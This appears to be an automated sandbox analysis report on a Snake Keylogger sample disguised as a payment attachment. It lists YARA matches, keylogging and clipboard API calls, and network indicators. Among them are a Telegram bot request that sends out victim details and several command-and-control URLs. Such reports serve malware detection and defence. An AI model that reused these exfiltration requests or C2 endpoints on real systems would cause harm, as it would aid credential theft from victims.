Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2019/11/2024%20/%2005:20:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mzgold.ir

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 18 Nov 2024 15:32:47 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000003019000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003019000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mzgold.ir
Source: RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3732731828.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.00000000063AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.0000000006378000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3732731828.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.00000000063AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.0000000006378000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3732731828.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.00000000063AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: RegSvcs.exe, 00000007.00000002.3732329936.0000000001191000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003044000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3732731828.0000000001236000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003035000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3737868170.00000000063AA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000003029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20a
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en8
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: z30ProofofPaymentAttached.exe, 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002E9D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187$
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000007.00000002.3735021208.0000000003E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.3733442866.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/8
Source: RegSvcs.exe, 00000007.00000002.3733442866.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49780 version: TLS 1.2

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_01006B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

1_2_01006B0C

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_01006D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

1_2_01006D07

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

1_2_01006B0C

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FF2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

1_2_00FF2B37

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.z30ProofofPaymentAttached.exe.f60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: z30ProofofPaymentAttached.exe PID: 7304, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7712, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: This is a third-party compiled AutoIt script.	1_2_00FB3D19
Source: z30ProofofPaymentAttached.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: z30ProofofPaymentAttached.exe, 00000001.00000000.1266319162.000000000105E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f7f34789-d
Source: z30ProofofPaymentAttached.exe, 00000001.00000000.1266319162.000000000105E000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_dd92407e-0
Source: z30ProofofPaymentAttached.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a0f2ba67-4
Source: z30ProofofPaymentAttached.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e04627a3-2

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: z30ProofofPaymentAttached.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FF6685: CreateFileW,DeviceIoControl,CloseHandle,

1_2_00FF6685

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FEACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

1_2_00FEACC5

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe

Code function: 1_2_00FF79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

1_2_00FF79D3

Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FDB043	1_2_00FDB043
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FC3200	1_2_00FC3200
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FC3B70	1_2_00FC3B70
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FE410F	1_2_00FE410F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FD02A4	1_2_00FD02A4
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FBE3B0	1_2_00FBE3B0
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FE038E	1_2_00FE038E
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FD06D9	1_2_00FD06D9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FE467F	1_2_00FE467F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FE4BEF	1_2_00FE4BEF
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_0101AACE	1_2_0101AACE
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FDCCC1	1_2_00FDCCC1
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FBAF50	1_2_00FBAF50
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FB6F07	1_2_00FB6F07
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_010131BC	1_2_010131BC
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FDD1B9	1_2_00FDD1B9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FCB11F	1_2_00FCB11F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FE724D	1_2_00FE724D
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FD123A	1_2_00FD123A
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FB93F0	1_2_00FB93F0
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FF13CA	1_2_00FF13CA
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FCF563	1_2_00FCF563
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FFB6CC	1_2_00FFB6CC
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FB96C0	1_2_00FB96C0
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FB77B0	1_2_00FB77B0
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FE79C9	1_2_00FE79C9
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FCFA57	1_2_00FCFA57
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FB9B60	1_2_00FB9B60
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FB7D19	1_2_00FB7D19
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FD9ED0	1_2_00FD9ED0
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FCFE6F	1_2_00FCFE6F
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00FB7FA3	1_2_00FB7FA3
Source: C:\Users\user\Desktop\z30ProofofPaymentAttached.exe	Code function: 1_2_00A1CEE8	1_2_00A1CEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00BE3CA8	7_2_00BE3CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00BED6F8	7_2_00BED6F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00BE8751	7_2_00BE8751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00BE38CC	7_2_00BE38CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00BE5830	7_2_00BE5830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00BE6948	7_2_00BE6948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0141C146	7_2_0141C146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01415362	7_2_01415362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0141D27D	7_2_0141D27D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0141C473	7_2_0141C473
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0141C738	7_2_0141C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0141E988	7_2_0141E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_014169A9	7_2_014169A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01413B95	7_2_01413B95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0141CA0D	7_2_0141CA0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0141CCDD	7_2_0141CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01416FC8	7_2_01416FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0141CFA9	7_2_0141CFA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0141F961	7_2_0141F961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0141E97B	7_2_0141E97B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_014129EC	7_2_014129EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01413AA1	7_2_01413AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01413E09	7_2_01413E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_067C1E80	7_2_067C1E80
